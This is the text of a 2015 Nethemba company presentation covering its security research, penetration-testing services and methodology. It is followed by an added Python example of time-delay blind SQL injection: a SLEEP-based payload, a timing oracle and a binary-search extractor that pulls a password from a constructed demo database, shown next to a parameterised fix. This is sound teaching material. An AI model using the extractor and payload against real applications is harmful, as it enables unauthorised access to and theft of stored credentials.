Nethemba company introduction

Nethemba www.nethemba.com company presentation

Pavol Luptak

on 15 July 2015


Nethemba company introduction
Nethemba history
2007 The Slovak company was founded
2008 Research: SMS public transport ticket vulnerabilities
2009 Research: Implementation of a Mifare Classic cracker
2010 Co-organization of the CONFidence security conference in Prague
2010 Research: SMS parking ticket vulnerabilities
2013 Launch of the "Digital privacy enhancing service" ("Chráňte svoje súkromie", i.e. "Protect your privacy")
2014 The Austrian subsidiary Nethemba GmbH was founded
2014 Organized the CypherConf security conference in Bratislava (together with ESET and Probin)
Nethemba - Who We Are
10 computer security experts (penetration testers, security consultants, social engineers, ...) from Slovakia and the UK
Established in Central Europe, covering the German-speaking market through Nethemba GmbH
Holders of renowned security certifications including CISSP (Certified Information Systems Security Professional), CEH (Certified Ethical Hacker), SCSecA (Sun Certified Security Administrator), CCNP Security, CCSP (Cisco Certified Security Professional), ...
Community support
Sponsorship of public security research (financial support for open-source IT security projects)
Artistic project (secondrealm.is)
Economic projects (Conservative Institute of M.R. Štefánik)
Progressbar hackerspace in Bratislava
Parallel Polis hackerspace in Prague
Research: Public transport SMS ticket hacking
In 2008 we revealed serious inherent vulnerabilities in public transport SMS tickets
We contacted the public transport companies in Prague, Bratislava and Vienna, but they decided not to fix these vulnerabilities
A few years later the first implementations (e.g. FareBandit) appeared
Paper available at http://www.nethemba.com/SMS-ticket-hack4.pdf
Research: Implementation of Mifare Classic cracker
In 2009 we demonstrated critical vulnerabilities in the RFID smartcards massively used in Slovakia and the Czech Republic (public transport, Czech/Slovak rail and buses, parking cards, ...)
Released the world's first open-source implementation of a Mifare Classic cracker, capable of recovering all keys for all sectors in a few minutes; around 1 billion Mifare Classic cards are affected (!)
Paper available at http://www.nethemba.com/mifare-classic-slides.pdf
Research: SMS parking ticket vulnerabilities
In 2010 we revealed critical vulnerabilities in SMS mobile parking
All big cities (including Bratislava and Košice) were affected
We waited a few years so that the service provider could fix this vulnerability
Paper available at http://www.nethemba.com/SMS-parking-hack.pdf
Digital privacy enhancing service "Chráňtesvojesúkromie.sk"
For Slovak and Czech customers we started to offer digital privacy enhancing services:
end-to-end encrypted calls (including design and implementation of call centers)
end-to-end encrypted emails, chat, SMS text communication
full disk encryption (including mobile phones)
desktop / mobile security hardening
For more information see http://www.chrantesvojesukromie.sk or http://www.chrantesvesoukromi.cz
On Tuesday 4 November 2014 we are organizing the first practical IT security conference in Bratislava (CypherConf)
Our core business
All kinds of penetration tests
Comprehensive web application security audits
Mobile application security audits (iOS, Android, Windows Phone, Blackberry)
Local system, wireless security audits, social engineering
Computer forensic analysis
Professional IT security training & courses
Design and development of secure VoIP solutions
Systems hardening, HA/LB cloud computing
Our specialties
Smart card (RFID) security audits
Hardware firmware reverse engineering and security audit
SAP system penetration tests and security audits
Security research in many areas
Code of Ethics
We strictly follow the rules of responsible vulnerability disclosure (and always contact the affected vendors a few months before publication)
We follow the Code of Ethics (not only because we are CISSPs and CEHs)
We strongly respect mutual NDAs and security assessment contracts
We DO NOT work for the government and government institutions due to various ethical and economical reasons
OWASP involvement
OWASP (Open Web Application Security Project) – the biggest and most respected free and open application security community
We are OWASP Testing Guide v3 and v4 (the best web application security testing guide) contributors
Our employees are the OWASP chapter leaders for Slovakia and attend many OWASP security conferences / trainings
Penetration tests
A method of evaluating the security of a computer system or network by simulating an attack by a malicious hacker
Involves an active analysis of the system for weaknesses, technical flaws or vulnerabilities, followed by their exploitation
The OSSTMM methodology or the OWASP Testing Guide is used
Penetration test approaches
Black box
- a zero-knowledge attack: no relevant information about the target environment is provided; the most realistic simulation of an external attacker
White box
- a full-knowledge attack: all security information about the environment and infrastructure is taken into account
Grey box
- a partial-knowledge attack
Penetration test phases
Information gathering
- information about the target system is identified and documented (WHOIS, public search engines, domain registrars, etc.)
Enumeration
- intrusive methods and techniques are used to gain more information about the target system (port scanning, fingerprinting)
Vulnerability mapping
- the findings from the enumeration are mapped to known and potential vulnerabilities
Exploitation
- access is attempted through the vulnerabilities identified in the vulnerability-mapping phase. The goal is to gain user-level and privileged (administrator) access to the system (custom exploit scripts or exploit frameworks are used)
Standard Web Application Test
The goal of the standard penetration test is to reveal as many of the most critical security vulnerabilities in the web application / web server as possible within 3 days, exploit them and gain privileged access where possible
Reveals the most serious vulnerabilities (SQL/LDAP injection, XSS/CSRF, buffer overflows, business logic flaws, authentication bypass, local file inclusion)
Because manual inspection is used, the test is highly recommended when your automated security scanners have already failed
Technical report with executive summary, all revealed vulnerabilities, risk levels and recommendations
Comprehensive Web Application Audit
The most comprehensive and deepest web application audit on the market
Strictly follows the OWASP Testing Guide v4
Practical hacking demonstration (writing exploit code, database dumps, XSS/CSRF demonstrations, etc.)
One-day meeting with the application's developers
Comprehensive report in English/Czech/Slovak
It takes 2-4 weeks per application
Smartphone Security Audit
A smartphone security audit involves a technical security audit of the mobile application itself and of the associated server-side web services (REST / SOAP).
During testing we follow the OWASP Mobile Security Project, focusing mainly on the Top Ten Mobile Controls
Suitable for any company that develops or operates its own mobile applications
Testing time: 1-3 weeks depending on the complexity
Financial sector
- banking groups, banks and insurance companies in Austria, Czech Republic and Slovakia

Telco sector
- telecommunications and mobile operators in Czech Republic and Slovakia

Other corporations
- transport, energy, development companies, e-shops, online casinos, ... in the USA and Central Europe
Used tools and methodologies
We strictly follow OSSTMM and OWASP Testing Guide
We use many commercial and opensource tools
We develop our own (NSQL – a time-delay blind SQL injector)
We use manual inspection and can reveal many critical security vulnerabilities that automated tools do not
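The time-delay blind SQL injection technique that a tool like NSQL automates, shown here as an added example (hypothetical Python, not NSQL and not Nethemba's code). It assumes a constructed in-memory SQLite application with a MySQL-style SLEEP() function registered, a constructed users table holding the secret "s3cret", and the helper names vulnerable_lookup, safe_lookup, oracle and extract_secret, all of which are assumptions. The extractor never sees query output; it infers each character of the password from response time alone, and the parameterised safe_lookup shows why the same payload leaks nothing against the hardened code.

```python
"""Time-delay blind SQL injection against a simulated vulnerable endpoint.

Hypothetical example. The "application" is an in-memory SQLite database
with a MySQL-style SLEEP() registered, so the injected
CASE WHEN <cond> THEN SLEEP(d) ELSE 0 END pays a measurable delay only
when the attacker's condition is true. All data below is constructed.
"""
import sqlite3
import time

DELAY = 0.05            # seconds the payload sleeps when the condition holds
THRESHOLD = DELAY / 2   # a response slower than this means "condition true"


def build_app():
    """Constructed vulnerable demo app: one table, one secret."""
    conn = sqlite3.connect(":memory:")
    # SQLite has no SLEEP(); emulate MySQL's so the payload reads the same.
    conn.create_function("SLEEP", 1, lambda s: time.sleep(s) or 0)
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', 's3cret')")  # constructed
    return conn


def vulnerable_lookup(conn, username):
    """The bug: user input is spliced into the SQL text."""
    sql = f"SELECT id FROM users WHERE name = '{username}'"
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error:
        return []   # generic error page: no data leaks, but timing still does


def safe_lookup(conn, username):
    """Hardened form: a bound parameter can never become SQL syntax."""
    return conn.execute("SELECT id FROM users WHERE name = ?",
                        (username,)).fetchall()


def oracle(conn, lookup, condition):
    """True if the injected SQL condition held, judged by response time only."""
    payload = (f"admin' AND (CASE WHEN ({condition}) "
               f"THEN SLEEP({DELAY}) ELSE 0 END) -- ")
    start = time.perf_counter()
    lookup(conn, payload)
    return time.perf_counter() - start > THRESHOLD


def extract_secret(conn, lookup, column="password", max_len=32):
    """Recover users.<column> for 'admin' one character at a time.

    Each character is found by binary search over 7-bit ASCII using only
    "is the code point greater than mid?" timing answers (about 7 requests
    per character). Past the end of the string substr() is empty and
    unicode() is NULL, so every comparison is false and the search ends at 0.
    """
    secret = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            cond = (f"(SELECT unicode(substr({column}, {pos}, 1)) "
                    f"FROM users WHERE name = 'admin') > {mid}")
            if oracle(conn, lookup, cond):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break           # end of string (or the target is not injectable)
        secret += chr(lo)
    return secret


if __name__ == "__main__":
    app = build_app()
    print("leaked via timing:", extract_secret(app, vulnerable_lookup))
    print("parameterised query leaks:", repr(extract_secret(app, safe_lookup)))
```

The only signal the attacker receives is whether the request took longer than THRESHOLD, which is why a blank error page or a constant response body does not stop this class of injection; only keeping input out of the SQL text (the bound parameter in safe_lookup) does. In practice the delay and threshold must be tuned to the network jitter of the real target, and the same binary search extends to any expression the database can evaluate, not just one column.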